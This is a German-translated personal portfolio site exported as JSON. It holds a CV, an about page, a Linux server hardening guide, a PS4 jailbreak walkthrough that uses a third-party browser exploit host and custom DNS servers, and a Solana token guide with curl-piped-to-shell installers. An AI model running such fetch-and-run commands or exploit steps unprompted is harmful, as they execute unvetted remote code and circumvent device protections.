[{"content":"Luka Piplica # Hinweis: Diese Seite wurde mit Hilfe von DeepL und Google Translate ins Deutsche übersetzt. Zuletzt aktualisiert am 16. Oktober 2022 Basisinformation # Website Link E-mail: lukapiplica@protonmail.ch Website: https://lukapiplica.github.io Github: https://github.com/lukapiplica LinkedIn: https://linkedin.com/in/lukapiplica Professionelle Zusammenfassung # Ergebnisorientierter und anpassungsfähiger IT-Profi mit Erfahrung in Kundenservice, technischem Support, PC-Wartung und Systemadministration. Geschicklichkeit bei der Implementierung technologiebasierter Lösungen für Geschäftsprobleme sowie Standards, Verfahren und Prozesse besitzen, die die Geschäftsfunktionalität verbessern.\nBerufserfahrung # Radiofernsehen von Bosnien und Herzegowina (BHRT) # Januar 2022 - September 2022 Spezialist für IT-Support, Sarajevo.\nBenutzerdefinierte Windows-Installationen mit vorinstallierten Client-Programmen für maximale Effizienz erstellt. Verwaltete und überwachte das Unternehmensnetzwerk. Kundenseitiger Helpdesk-Support vor Ort für: Microsoft Office, Adobe-Produkte, Cinegy und andere interne Programme und Systeme. Wartung und Verwaltung der Internet-Radioverbindung für RTVFBIH. Einrichtung und Konfiguration von WiFi-Routern, L2- und L3-Switches und Hubs sowie Netzwerkverkabelung und Kabelmarkierung. Überwachung und Wartung von Druckservern und Druckern. Verwaltung der Webmail-Datenbank. Verwaltung des ESET Antivirus-Servers. Bereitstellung und Wartung eines lokal gehosteten Webservers, FTP sowie mehrerer SMB-Freigaben. Erziehung # ITAcademy # 2019-2021 Netzwerkadministrator, Sarajevo.\nErworbene Kenntnisse und Erfahrungen mit den Betriebssystemen Windows 10, Windows Server 2016, GNU/Linux und nagiOS. Sie haben gelernt, wie man Cisco und MikroTik-Geräte in einem Netzwerk konfiguriert und einrichtet. Erlernte Bash, Batch und PowerShell-Skripterstellung. Ich habe die Fähigkeit erlangt, einen sehr detaillierten Bericht über Cybersicherheit und Cyberangriffsprävention und -implementierung zu erstellen. Zertifizierung # Name Credential ID Network Administrator 025056 Eisenbahnschulzentrum # 2015-2019 Elektrotechniker, Sarajevo.\nIm ersten Jahr verbesserte ich meine Kenntnisse über verschiedene elektronische Bauteile und perfektionierte meine Lötfähigkeiten. Zweites Jahr, Programmieren einer Arduino-gesteuerten Basketball-Anzeigetafel über eine HTML-Website. Entwarf im dritten Jahr einen Solarpanel-Baum mit einem eingebauten Bluetooth-Radio, das Mobiltelefone aufladen kann. Gruppenprojekt - Retro-Radio mit eingebauter Nixie-Röhrenuhr. Programmierung und Zusammenbau eines Roboterarms, der über eine Android-Anwendung gesteuert wird. Die Fähigkeit erlangt, benutzerdefinierte Leiterplatten zu erstellen. Im vierten Jahr leitete er eine Gruppe von Gymnasiasten und beteiligte sich mit ihnen an der Gestaltung und Herstellung eines unendlichen Spiegels. Kenntnisse über alte und aktuelle Modelle der Telekommunikation erworben. Highschool-Aktivitäten # Elektrochemie Grundlagen der Elektrotechnik Englisch Mathematik Elektrotechnik Zertifikate # Name des Wettbewerbs Typ Ort Eisenbahnschulzentrum Grundlagen der Elektrotechnik Schule Erste IX Fest der Arbeit Zustand Erste X Fest der Arbeit Zustand Erste XI Fest der Arbeit Zustand Erste Hinweis: Diese Zertifizierungen wurden im wirklichen Leben ausgestellt, aber ich habe eine digitale Kopie; Wenn Sie sie sehen möchten, können Sie mir gerne eine E-Mail senden! Ehrenamtliche Erfahrung # Adair Café Bar # November 2021 - Februar 2022 Website Developer and Graphic Designer\nIch habe eine Website für das Café entwickelt; Ich habe viele Dinge wie HTML, CSS und Website-Optimierung gelernt. Während ich die Website programmierte, sammelte ich außerdem einige Erfahrungen mit Grafikdesign für die Erstellung eines neuen Logos, einer Speisekarte und eines Werbeplakats. Dadurch sammelte ich Erfahrungen in den Programmen Adobe Photoshop und Adobe Illustrator.\nVerknüpfung: https://adaircafebar.cf Sprachen # Menschen # Sprache Proficiency Englisch Professionelles Arbeiten Bosnisch/Kroatisch/Serbisch Native oder zweisprachig Deutsch Elementar Maschine # Sprache Markup Python HTML bash/shell Latex CSS Markdown Alle Zertifizierungen # Zertifikate Zertifikat-ID ITAcademy Certified Computer Network Administrator 025056 Google Digital Garage 325 B49 2XV Udemy Learn to code with Python 3! UC-8aea5973-75b9-45f4-ac48-c2b3542c071e The Complete Python Hacking Course: Begginer to Advanced! UC-b268fbf0-8a81-4575-97a3-75876f56ab12 TryHackMe Complete Begginer Learning Path THM-PV3UWE6H73 TryHackMe CompTIA Pentest+ Learning Path THM-VJ140KARRQ TryHackMe Offensive Pentesting Learning Path THM-EUR7X51H4W TryHackMe Web Fundamentals Learning Path THM-CMQJCBRKFN TryHackMe Advent of Cyber 2020 THM-TVKIPRVSSQ Verweise # Schicken Sie mir eine E-Mail, wenn Sie Interesse an mir haben, und ich werde Sie an jemanden verweisen, der für mich bürgen kann. ","date":"14 Oktober 2022","permalink":"/de/cv/","section":"Curriculum Vitae","summary":"Luka Piplica # Hinweis: Diese Seite wurde mit Hilfe von DeepL und Google Translate ins Deutsche übersetzt. Zuletzt aktualisiert am 16. Oktober 2022 Basisinformation # Website Link E-mail: lukapiplica@protonmail.ch Website: https://lukapiplica.","title":"Curriculum Vitae"},{"content":"","date":"14 Oktober 2022","permalink":"/de/","section":"Luka Piplica","summary":"","title":"Luka Piplica"},{"content":" 👋 Über mich 👋 Hinweis: Diese Seite wurde mit Hilfe von DeepL und Google Translate ins Deutsche übersetzt. Wie alles begann # Hallo, mein Name ist Luka. Ich bin ein junger Netzwerkadministrator und Cybersicherheitsexperte. Ich interessiere mich für Technik, seit ich klein war, und alles begann mit meiner ersten Computerreparatur, einem defekten RAM-Stick, den ich ersetzen musste. Danach fing ich an, mit der Elektronik in PCs zu experimentieren, und nach einiger Zeit hatte ich ein gewisses Grundwissen darüber, wie Computer funktionieren.\nIm Laufe der Zeit erwarb ich immer mehr Kenntnisse, und ich begann damit, meine Familie und Freunde im IT-Bereich zu unterstützen. Ich begann mit Anleitungen zur Verwendung von Computern, ging dann zur Neuinstallation von Betriebssystemen über und erwarb danach einige grundlegende A+ Kenntnisse über Computersysteme.\nOberschule # Ich habe das Eisenbahn-Schulzentrum mit dem Titel Elektrotechniker abgeschlossen. Dank vieler Professoren an dieser Schule habe ich neue Kenntnisse über verschiedene elektronische Komponenten, Telekommunikationssysteme usw.\nErstes Jahr # Im ersten Jahr habe ich Kenntnisse über elektrische Komponenten (Widerstände, Kondensatoren, Spulen usw.) erworben und meine Lötfähigkeiten verbessert. Ich habe den ersten Platz beim Schülerwettbewerb im Fach Grundlagen der Elektrotechnik gewonnen. Ich besuchte auch mehrere Highschool-Abschnitte, darunter:\nElektrochemie, Englische Sprache, Grundlagen der Elektrotechnik, Mathematik. Zweites Jahr # Während des zweiten Jahres hatte ich die Gelegenheit, mit einer Gruppe von Klassenkameraden an dem Projekt \u0026ldquo;Arduino Scoreboard\u0026rdquo; zu arbeiten, das uns den ersten Platz beim staatlichen Wettbewerb (IX Fest der Arbeit in Hadžići einbrachte.\nThe Arduino Scoreboard is made using an Arduino microcontroller, and a WiFi module that connects us to the HTML web page (which you can see on the laptop) and with it we control the numbers and time on the traffic light. The numbers are handmade from an LED strip that acts like seven-segment displays. Drittes Jahr # Das Arduino Scoreboard wird mit einem Arduino-Mikrocontroller und einem WiFi-Modul erstellt, das uns mit der HTML-Webseite verbindet (die Sie auf dem Laptop sehen können) und mit der wir die Zahlen und die Zeit an der Ampel steuern. Die Zahlen werden aus einem LED-Streifen handgefertigt, der wie Sieben-Segment-Anzeigen wirkt.\nWie im Vorjahr nahmen wir an der X Fest der Arbeit teil, die in Zenica stattfand. Als Projekt hatten wir einen Solarbaum, der uns den ersten Platz einbrachte.\nViertes Jahr # Im letzten Jahr haben wir hauptsächlich über Telekommunikation gelernt, wo ich für meine Abschlussarbeit ein Thema über Funkempfänger hatte. Das Projekt, an dem wir für das XI Fest der Arbeit gearbeitet haben, ist ein LED-Schreibtisch, der mit einem Arduino-Mikrocontroller programmiert wurde, um Muster anzuzeigen.\nDieses Projekt brachte uns im dritten Jahr in Folge den ersten Platz ein.\nITAcademy # Nach dem Abitur habe ich mich entschieden, meine Kenntnisse der Informatik an der ITAcademy im Bereich Netzwerkadministration fortzusetzen. Insbesondere die CCNA-Vorbereitung (Cisco Certified Network Administrator), bei der ich lernte, viele Netzwerkgeräte einzurichten und zu konfigurieren, sowie fortgeschrittene Kenntnisse in der Verwendung von Windows Server- und Linux-Betriebssystemen. Nach meinem Abschluss an der ITAcademy habe ich mich entschieden, mein aktuelles Wissen im Bereich Cybersicherheit zu erweitern. Ich bin derzeit der Erste in Bosnien und Herzegowina am TryHackMe-Tisch.\nMeine Hobbies # ⌨️ [Linux OS]\nFortgeschrittene Kenntnisse in der Verwendung von Linux-Betriebssystemen, verschiedenen Distributionen und fortgeschrittene Kenntnisse des Terminals und seiner Befehle. Ich habe mich für das Betriebssystem Linux entschieden, weil ich gerne mit verschiedenen TWMs (Tiling Window Manager) experimentiere. Ich habe diese Distributionen unten verwendet:\nUbuntu Linux Debian Linux Pop!_OS Kali Linux Parrot OS Arch Linux Artix Linux Manjaro Linux Gentoo Linux 💿 [Elektronik]\nIch experimentiere immer mit Elektronik, von Computern über Handys, Fernseher usw.\nWenn etwas kaputt ist, versuche ich es immer selbst zu zerlegen und zu reparieren, und wenn ich etwas nicht weiß, gibt es immer einen guten Freund namens Internet. Ich bin auch mit der Hard- und Softwareseite vieler elektronischer Geräte vertraut.\n🤖 [Cybersecurity]\nIch verbringe den größten Teil meiner Freizeit damit, über neue Hackerangriffe zu recherchieren und zu lesen und wie dieser Angriff durchgeführt wurde.\nWenn es sich um Malware handelt, erstelle ich eine virtuelle Maschine, installiere die schädliche Datei und analysiere sie dann. Was die Datei gerade auf dem System tut, mit welchen anderen Dateien kommuniziert sie, was schreibt sie in den Speicher usw. Genau aus diesem Grund habe ich diesen Blog gestartet, um diesen Prozess zu dokumentieren.\n📚 [Arduino Programmierung]\nViele Projekte können auf einem Arduino-Mikrocontroller durchgeführt werden. Der Arduino dient uns als Gehirn elektronischer Bauteile.\nEs ist auch großartig für Anfänger, die etwas über Elektronik lernen möchten, aber das bedeutet nicht, dass das Arduino nur für sie gedacht ist. Mit diesem Mikrocontroller können wir viele komplexe Projekte durchführen.\n🖥️ [Raspberry Pi]\nDer Raspberry Pi ist ein kleiner Computer mit Prozessor, Speicher usw. Er eröffnet viele neue Möglichkeiten für noch komplexere Projekte als Arduino, wie: Satellitenverfolgung, Arcade-Automaten mit alten Spielen, SNES (Super Nintendo)-Emulator, usw.\n💻 [Alte Konsolen]\nIch sammle alte Spielkonsolen und mache dann Projekte darauf.\nEin Beispiel für ein Projekt, an dem ich gearbeitet habe, ist die Installation eines Linux-Betriebssystems auf einem Nintedno 3DS. Ich modifiziere auch Konsolen wie zum Beispiel Xbox 360 mit einem RGH oder JTAG-Chip.\n📁 [Aktivist für digitalen Datenschutz]\nDass große Unternehmen wie Google und Facebook uns ausspionieren, ist schon lange bekannt. Sie versetzen uns in eine Lage, in der ein normaler Bürger 24 Stunden am Tag überwacht wird. Leider wird in Bosnien und Herzegowina das Thema digitaler Datenschutz nicht so oft erwähnt. Warum haben Unternehmen überhaupt das Recht, Daten über uns zu sammeln?\nIhre Privatsphäre, Ihre Kontrolle über Ihre Daten und Ihre Meinungsfreiheit im Internet!\nVielen Dank für Ihre Zeit 💙 # ","date":"13 Oktober 2022","permalink":"/de/about/","section":"Über mich","summary":"👋 Über mich 👋 Hinweis: Diese Seite wurde mit Hilfe von DeepL und Google Translate ins Deutsche übersetzt. Wie alles begann # Hallo, mein Name ist Luka. Ich bin ein junger Netzwerkadministrator und Cybersicherheitsexperte.","title":"Über mich"},{"content":"","date":"9 Oktober 2022","permalink":"/de/blog/","section":"Blogs","summary":"","title":"Blogs"},{"content":"","date":"9 Oktober 2022","permalink":"/de/categories/","section":"Categories","summary":"","title":"Categories"},{"content":"","date":"9 Oktober 2022","permalink":"/de/categories/linux/","section":"Categories","summary":"","title":"Linux"},{"content":" 🐧 So schützen Sie einen Linux-Server ! 🐧 Hinweis: Diese Seite wurde mit Hilfe von DeepL und Google Translate ins Deutsche übersetzt. Jeder weiß bereits, dass Sie einen Server schützen und sicherer machen sollten. Nun, hier sind einige grundlegende Schritte zum Schutz Ihrer Server. Fangen wir gleich an:\nErstens würde ich dringend empfehlen, das HTTPS-Protokoll für Ihre Spiegel zu verwenden!\nIch gehe davon aus, dass Sie einen frisch installierten Linux-Server haben. Denken Sie daran, dass diese Befehle auf den apt-Paketmanager ausgerichtet sind, aber sie sollten auch mit anderen Paketmanagern mit kleinen Änderungen funktionieren.\nAktualisierung Ihres Servers # Nach einer Neuinstallation aktualisiere ich als erstes den Server manuell:\nsudo apt update sudo apt upgrade Automatische Updates aktivieren # Nachdem ich meinen Server manuell aktualisiert habe, aktiviere ich normalerweise automatische Updates.\nDenken Sie daran, je nachdem, wie kritisch der Server ist, möchten Sie möglicherweise nicht, dass Updates ihn beschädigen.\nUm automatische Updates zu aktivieren, benötigen Sie ein Paket namens unattended-upgrades !\nsudo apt install unattended-upgrades Dann müssen Sie es aktivieren:\nsudo dpkg-reconfigure --priority=low unattended-upgrades Secure Shell (SSH) # Vorbereitung # Normalerweise erfolgt die Verbindung zu Servern remote über das SSH-Protokoll auf dem Standardport 22.\nZuerst erstelle ich einen neuen Ordner mit dem Namen .ssh, falls er nicht im /home-Verzeichnis existiert.\nmkdir ~/.ssh Dann vergeben wir die Ordnerberechtigungen von 700, was eine Datei vor dem Zugriff anderer Benutzer schützt, während der ausstellende Benutzer noch vollen Zugriff hat.\nchmod 700 ~/.ssh Nun wollen wir uns von unserem Server abmelden, wenn wir per ssh verbunden sind.\nlogout Generieren eines soliden Secure Shell-Schlüsselpaars # Lassen Sie uns nun ein öffentliches und ein privates Schlüsselpaar generieren, damit wir uns sicher mit dem Server verbinden können. Ich verwende den ed25519-Algorithmus, da er schnell ist und die Sicherheit nicht beeinträchtigt.\nIch würde auch empfehlen, eine Passphrase zu verwenden.\nWindows Powershell: ssh-keygen -t ed25519 Linux Terminal: ssh-keygen -t ed25519 MacOS Terminal: ssh-keygen -t ed25519 Dadurch werden die privaten und öffentlichen Schlüssel in Ihrem home/.ssh-Ordner gespeichert, abhängig von Ihrem Betriebssystem, es könnte versteckt sein.\nKopieren des öffentlichen Schlüssels auf den Server aus der Ferne # Nachdem die öffentlichen und privaten Schlüssel generiert wurden, müssen wir sie auf den Server übertragen. Ich werde SCP verwenden, um den Schlüssel auf den Server zu verschieben.\nWindows Powershell: scp $env:USERPROFILE/.ssh/id_ed25519.pub SERVER_USER@SERVER_IP:~/.ssh/authorized_keys Linux Terminal: ssh-copy-id SERVER_USER@SERVER_IP MacOS Terminal: scp ~/.ssh/id_ed25519.pub SERVER_USER@SERVER_IP:~/.ssh/authorized_keys Passwortloser Fernzugriff und Ändern des Standardports # Jetzt müssen wir unser ssh sperren und Passwörter deaktivieren, damit Sie sich nur mit den generierten Schlüsselpaaren anmelden können. Wir melden uns bei unserem Server an und bearbeiten die ssh-Konfigurationsdatei.\nÖffnen der Konfigurationsdatei:\nsudo nano /etc/ssh/sshd_config Lassen Sie uns den standardmäßigen Port von 22 ändern. Kommentieren Sie die Zeile Port aus, löschen Sie die Nummer 22 und fügen Sie etwas nach Ihrem Geschmack hinzu.\nVerwenden Sie zum Beispiel höhere Zahlen wie 4723.\nJetzt können Sie in der Zeile AddressFamily angeben, ob Sie IPv4, IPv6 oder beides verwenden möchten. Ich deaktiviere IPv6, aber das musst du nicht. Wenn Sie nur IPv4 verwenden möchten, ersetzen Sie any durch inet\nRoot-Anmeldung deaktivieren, indem PermitRootLogin yes durch PermitRootLogin no ersetzt wird.\nDeaktivieren Sie dann die Passwortauthentifizierung, indem Sie PasswordAuthentication yes durch PasswordAuthentication no ersetzen\nSpeichern Sie nun die Änderungen!\nNeustart von SSH, um Änderungen zu übernehmen # Nachdem wir Änderungen an der Konfigurationsdatei vorgenommen haben, müssen wir nun den ssh-Dienst neu starten.\nsudo systemctl restart sshd HINWEIS: Stellen Sie sicher, dass Sie eine Verbindung haben, indem Sie versuchen, eine Verbindung von einem anderen Terminal/einer anderen Powershell herzustellen. Wenn Sie einen Fehler machen, können Sie sich aussperren! Firewall aktivieren # Überprüfen Sie zunächst Ihre verwendeten Ports, indem Sie:\nsudo ss -tupln Möglicherweise haben Sie andere Ports verwendet, recherchieren Sie, aber ich werde ssh nur aktivieren, damit ich eine Verbindung zum Server herstellen kann.\nZuerst installieren wir ufw.\nsudo apt install ufw Als Firewall verwende ich ufw. Denken Sie an den letzten Port, den wir in die Konfigurationsdatei von ssh eingefügt haben. Wir müssen es zulassen. Außerdem wird immer empfohlen, anzugeben, welches Protokoll der Port verwendet, entweder TCP oder UDP!\nsudo ufw allow SSH_PORT/tcp Dann müssen wir die Firewall aktivieren.\nsudo ufw enable Um zu überprüfen, welche Regeln erlaubt sind, können wir Folgendes verwenden:\nsudo ufw status ICMP deaktivieren (ping) # Normalerweise ist der Befehl ping hilfreich für Netzwerkadministratoren und Hacker. Am besten deaktivieren Sie Ping!\nUm Ping zu deaktivieren, müssen wir die ufw-Konfiguration bearbeiten.\nsudo nano /etc/ufw/before.rules Fügen Sie unter dem Abschnitt ok icmp codes for INPUT diese Zeile so ein, dass sie an erster Stelle steht (direkt unter ok icmp codes for INPUT).\n-A ufw-before-input -p icmp --icmp-type echo-request -j DROP Starten Sie den Server neu:\nsudo reboot now Ping wurde jetzt deaktiviert!\nSchlussfolgerung # Der nicht hackbare Server existiert nicht! Denken Sie daran, dass jeder Server hackbar ist, aber dies ist eine bewährte Methode, die Sie in Betracht ziehen sollten, um Ihren Server zu härten.\nVielen Dank für Ihre Zeit 💙 # ","date":"9 Oktober 2022","permalink":"/de/blog/how-to-protect-a-linux-server/","section":"Blogs","summary":"🐧 So schützen Sie einen Linux-Server ! 🐧 Hinweis: Diese Seite wurde mit Hilfe von DeepL und Google Translate ins Deutsche übersetzt. Jeder weiß bereits, dass Sie einen Server schützen und sicherer machen sollten.","title":"So schützen Sie einen Linux-Server"},{"content":"","date":"21 April 2022","permalink":"/de/categories/consoles/","section":"Categories","summary":"","title":"Consoles"},{"content":" 🎮 PS4-Wiederherstellung und 9.00 Jailbreak 🎮 Hinweis: Diese Seite wurde mit Hilfe von DeepL und Google Translate ins Deutsche übersetzt. Haftungsausschluss: Ich plane, diese PS4 zu verwenden, um Linux darauf zu installieren und aus Neugier damit zu spielen. Ich dulde keine Piraterie; Dieser Artikel ist nur für Bildungszwecke gedacht! Ich übernehme keine Verantwortung für Ihre Taten! Ich habe eine gebrauchte PS4 Slim-Konsole gekauft, um damit zu spielen, und sie war mit 8.50-Firmware ausgestattet und wurde nie innen gereinigt. Das erste, was ich tat, war, es zu öffnen, um zu sehen, was \u0026ldquo;unter der Haube\u0026rdquo; war. Als ich es öffnete, sah ich Staub und als ich es einschaltete, war die PS4 so laut. Das bedeutete, dass die Wärmeleitpaste ausgetauscht und die Lüfter gereinigt werden mussten. Hier ist ein Bild von dem, was drin war:\nIch hatte vor, Linux auf dieser PS4 zu installieren, aber das erfordert einen Jailbreak und eine bestimmte Firmware-Version, und deshalb habe ich es mit einer ausreichend niedrigen Firmware-Version gekauft, damit ich es auf 9.00 aktualisieren kann.\nSie können die Firmware auf der PS4 nicht downgraden; Sie können es nur upgraden!\nWas brauchen Sie:\nUSB-Stick formatiert Wärmeleitpaste Schraubendreher Franzbranntwein Geduld Computer/Laptop Wiederherstellung: # Zuerst öffnete ich die PS4, löste einige Schrauben und so sah das Innere aus:\nJetzt benutze ich Franzbranntwein, um die alte Wärmeleitpaste loszuwerden.\nDie neue Wärmeleitpaste, die ich aufgetragen habe, ist Arctic MX-4.\nNach der Reinigung des Lüfters und des Kühlkörpers sieht das Ergebnis so aus:\nViel besser !\n9.00 Jailbreak # Nachdem ich die PS4 Slim zusammengebaut hatte, startete ich sie ohne Internet und führte einen Werksreset durch, indem ich zu Einstellungen/Initialisierung/PS4 initialisieren ging. Diese Option löschte alles, was zuvor auf der PS4 war, einschließlich Spiele und Konten.\nJetzt kommt der lustige Teil, der Jailbreak. Gehen Sie zuerst zu Einstellungen/System/Automatische Downloads und stellen Sie sicher, dass alle Kästchen deaktiviert sind.\nGehen Sie danach zu Einstellungen/Netzwerk und deaktivieren Sie das Kontrollkästchen Mit dem Internet verbinden. Diese Option verhindert, dass die PS4 das neueste Firmware-Update herunterlädt.\nGehen Sie nun zu Einstellungen/System/Systeminformationen und sehen Sie sich Ihre Firmware-Version an. Ich habe die Version 8.50, also muss ich meine PS4 manuell auf 9.00 aktualisieren.\nAktualisieren der PS4 auf 9.00 # Um die PS4 auf 9.00 zu aktualisieren, benötigen Sie ein USB-Laufwerk und einen PC. Zuerst müssen Sie die Firmware 9.00 herunterladen. Es gibt zwei Websites, eine hat schnellere Downloads, erfordert aber ein kostenloses Konto, und die zweite hat langsamere Downloads, erfordert aber kein Konto. Dark Software (schnellere Downloads, erfordert aber ein Konto) Darth Sternie (langsamere Downloads, erfordert aber kein Konto) Unabhängig davon, wofür Sie sich entscheiden, stellen Sie sicher, dass Sie die Firmware 9.00 herunterladen.\nStellen Sie nach dem Download sicher, dass Sie die Datei PS4UPDATE.PUP benennen\nFormatieren Sie es jetzt in exFAT auf Ihrem USB-Laufwerk.\nNachdem Ihr USB formatiert wurde, gehen Sie zum Stammordner Ihres USB und erstellen Sie einen neuen Ordner namens PS4, gehen Sie in diesen Ordner und erstellen Sie einen weiteren neuen Ordner namens UPDATE und dann im Ordner UPDATE, Sie werden die Datei PS4UPDATE.PUP kopieren. Denken Sie daran, dass die Ordner in Großbuchstaben geschrieben werden müssen.\nWerfen Sie jetzt das USB-Laufwerk aus, gehen Sie zur PS4 und überprüfen Sie Ihre Benachrichtigungen und löschen Sie sie!\nSchließe dein USB-Laufwerk an PS4 an und gehe zu Einstellungen/Systemsoftware-Update, das das Update von deinem USB auf 9.00 erkennen sollte. Folgen Sie den Anweisungen auf dem Bildschirm und aktualisieren Sie die PS4.\nJailbreak der PS4 # Nachdem Sie sich auf der Firmware-Version 9.00 befinden, gehen Sie zu Einstellungen/Netzwerk und aktivieren Sie das zuvor deaktivierte Kontrollkästchen Mit dem Internet verbinden.\nGehen Sie nun zu der unten stehenden Option Internetverbindung einrichten, Sie können entweder WLAN oder Ethernet verwenden, dann wählen Sie Benutzerdefiniert, Sie können wählen, ob Sie DHCP oder eine statische IP möchten, und dann wählen Sie *Nicht angeben * für DHCP-Hostname und stellen Sie sicher, dass Sie Manuell für die DNS-Einstellungen auswählen!\nAls meine primäre DNS verwende ich 192.241.221.79 und als meine sekundäre DNS verwende ich 165.227.83.145! Diese DNS-IPs blockieren alle Verbindungen zu den Servern von Sony, damit die PS4 nicht versehentlich ein Update erhält.\nNachdem der DNS angegeben wurde, klicken Sie auf Weiter und wählen Sie Automatisch für MTU-Einstellungen und Nicht verwenden für Proxyserver.\nTrennen Sie nun das USB-Laufwerk von der PS4 mit der Update-Datei 9.00 und schließen Sie es wieder an den PC an.\nAuf dem PC müssen Sie Rufus und die exfathax.img von Github. Öffnen Sie Rufus, wählen Sie Ihr USB-Laufwerk und als ISO die Datei exFAThax.img aus und klicken Sie in Rufus auf Start.\nGehen Sie jetzt zur PS4 und öffnen Sie den PS4-Webbrowser, bevor Sie Ihren USB-Anschluss anschließen, und stellen Sie sicher, dass Sie den gesamten Verlauf und Cache löschen. Danach können Sie einen Host Ihrer Wahl verwenden, der Payloads anbietet.\nIch benutze Karo218 !\nNachdem Sie nun Ihren gesamten Browserverlauf, Cookies und Daten gelöscht haben, gehen Sie zum Host und klicken Sie auf 9,00 Gold. Sie müssen warten, bis sich der Exploit für die Offline-Nutzung zwischengespeichert hat. Nachdem es fertig ist, klicken Sie auf GoldHenV2.2.4, und der Exploit sagt Ihnen, wann Sie Ihren USB-Stick anschließen müssen.\nWarten Sie, bis die Payload die GoldHEN-Benachrichtigung anzeigt, und Sie haben eine PS4 mit Jailbreak.\nHINWEIS: Wenn Fehler auftreten oder die Konsole abstürzt, starten Sie die PS4 neu und versuchen Sie es erneut! Dieser Jailbreak ist nicht persistent, d.h. nach einem Herunterfahren oder einem Neustart musst du alles neu machen, eine Lösung ist, deine PS4 in den Ruhemodus zu versetzen, oder du könntest alles automatisch machen, aber es erfordert einen ESP32-52 bzw ein Raspberry Pi! Endergebnis # Schlussfolgerung # Angenehmes Projekt zu tun, vor allem da der Preis der PS4 wegen der PS5 Veröffentlichung gefallen ist. Reinigen Sie die PS4 war befriedigend, und ich muss sagen, es ist schwierig, das Slim-Modell zu öffnen. Jailbreak war erfolgreich wie erwartet, und für mich, es funktionierte fast 80% der Zeit, es hatte einige Abstürze hier und da, aber ein Neustart behoben. Ich freue mich schon darauf, Linux auf der Konsole zu installieren.\nVielen Dank für Ihre Zeit 💙 # ","date":"21 April 2022","permalink":"/de/blog/ps4-restoration-and-jailbreak/","section":"Blogs","summary":"🎮 PS4-Wiederherstellung und 9.00 Jailbreak 🎮 Hinweis: Diese Seite wurde mit Hilfe von DeepL und Google Translate ins Deutsche übersetzt. Haftungsausschluss: Ich plane, diese PS4 zu verwenden, um Linux darauf zu installieren und aus Neugier damit zu spielen.","title":"PS4-Wiederherstellung und 9.00 Jailbreak"},{"content":"","date":"22 Januar 2022","permalink":"/de/categories/cryptocurrency/","section":"Categories","summary":"","title":"Cryptocurrency"},{"content":" 💸 HSKY Token 💸 Hinweis: Diese Seite wurde mit Hilfe von DeepL und Google Translate ins Deutsche übersetzt. Was ist ein Krypto-Token? # Heutzutage verwenden immer mehr Menschen Kryptowährungen; Einige berühmte sind Bitcoin, Dogecoin, Etherium, Solana usw. Alle diese Kryptowährungen haben ihre Blockchain. Wir machen einen Krypto-Token; Im Gegensatz zu anderen gängigen Kryptowährungen mit eigener Blockchain funktionieren Krypto-Token auf Blockchains anderer Kryptowährungen. Insbesondere werden wir Solana wegen der günstigen Gebühr beim Wechsel dieses Tokens und der Geschwindigkeit verwenden (Solana hat im Gegensatz zu den anderen eine sehr schnelle Blockchain).\nWas wird benötigt: # Betriebssystem: Debian Linux Github-Profil Github Krypto-Austausch Binance Phantom-Brieftasche PhantomWallet Solflare Solflare HINWEIS: Es ist notwendig, Solana zu kaufen! Anweisungen # Wir müssen eine virtuelle Maschine erstellen und dann Debian Linux in der CLI installieren (ohne grafische Oberfläche).\nNach der Installation von Debian müssen Sie als Erstes das System aktualisieren.\nDebian aktualisieren # sudo apt update sudo apt upgrade Installieren von Solanas-Tools # sh -c \u0026#34;$(curl -sSfL https://release.solana.com/v1.8.5/install)\u0026#34; Geben Sie dann exit ein und melden Sie sich erneut bei CLI an.\nErstellen einer Krypto-Wallet # solana-keygen new Drücken Sie zweimal die Eingabetaste, und Sie haben erfolgreich eine Brieftasche erstellt.\nHINWEIS: Der öffentliche Schlüssel ist eigentlich Ihre Brieftaschenadresse, und speichern Sie die Seed-Phrase irgendwo, falls Sie die Brieftasche verlieren! Solana kaufen # Um unseren Token herzustellen, müssen wir Solana kaufen. Meine Empfehlung ist Binance.\nÜbertragung von Solana # Nachdem wir Solana gekauft haben, befindet es sich auf Binance. Wir müssen es in die Brieftasche auf der virtuellen Maschine übertragen.\nHINWEIS: Die Adresse, an die Sie von Binance senden, ist der öffentliche Schlüssel, den wir in einer virtuellen Maschine erstellt haben! Nachdem wir Solana erfolgreich übertragen haben, wollen wir sehen, wie viele Solana wir in CLI haben; wir tippen:\nsolana balance Installation von Rust # curl https://sh.rustup.rs -sSf | sh Nachdem Sie auf die Eingabetaste geklickt haben, drücken Sie 1 für die Standardinstallation.\nGeben Sie exit ein und melden Sie sich erneut bei der virtuellen Maschine an.\nInstallation der erforderlichen Pakete # sudo apt install libudev-dev libssl-dev pkg-config build-essential Installation von SPL # cargo install spl-token-cli Erstellen eines Krypto-Tokens # spl-token create-token Erstellen eines Kontos, das unser Token behält # spl-token create-account *TOKEN ID* HINWEIS: Die Token-ID ist ein Token, das wir durch die Eingabe des letzten Befehls erhalten haben! Prägen von Token und Erstellen der Anzahl von Token # spl-token mint *ERSTE TOKEN-ID* *ANZAHL DER MENGEN* *ZWEITE TOKEN-ID DES KONTOS* Sie haben Ihr Token erfolgreich erstellt.\nÜbertragung Ihrer Token an andere: # Um Ihr Token an andere zu übertragen, müssen diese zunächst entweder auf dem Telefon oder in einem Webbrowser eine Brieftasche erstellen. Wenn Sie eine Brieftasche auf Ihrem Telefon erstellen möchten, ist Solflare eine großartige Brieftasche, und wenn Sie eine Brieftasche in einem Webbrowser erstellen möchten, schlage ich Phantom Wallet vor.\nspl-token transfer --fund-recipient --allow-unfunded-recipient *ERSTE TOKEN-ID* *WIE VIEL MÖCHTEN SIE SENDEN* *WALLET-ADRESSE, AN DIE WIR UNSERE TOKEN SENDEN WERDEN* Solscan Website # Solscan Website: https://solscan.io/ Wir können die erste TOKEN-ID auf dieser Seite einfügen, um unser Token zu überprüfen.\nHinzufügen eines Tokens zur Solana-Registrierung # Erstellen Sie zunächst ein Bild für Ihren Token; es muss kleiner als 200 kb sein.\nErstellen Sie ein Github-Konto.\nBitte erstellen Sie ein neues Repository und laden Sie ein Bild Ihres Tokens in dieses Repository hoch (benennen Sie es logo.png).\nBesuchen Sie https://github.com/solana-labs/token-list und forken Sie es. Drücken Sie . um Visual Studio Code in Ihrem Webbrowser zu öffnen. Gehen Sie links zu assets/mainnet rechts, klicken Sie auf und erstellen Sie einen neuen Ordner und fügen Sie die Token-Adresse ein.\nKlicken Sie mit der rechten Maustaste auf den Ordner und klicken Sie auf Hochladen. Laden Sie dann das Bild Ihres Tokens hoch.\nGehen Sie dann zum Ordner src auf der linken Seite, und Sie sehen den Ordner tokens, öffnen Sie 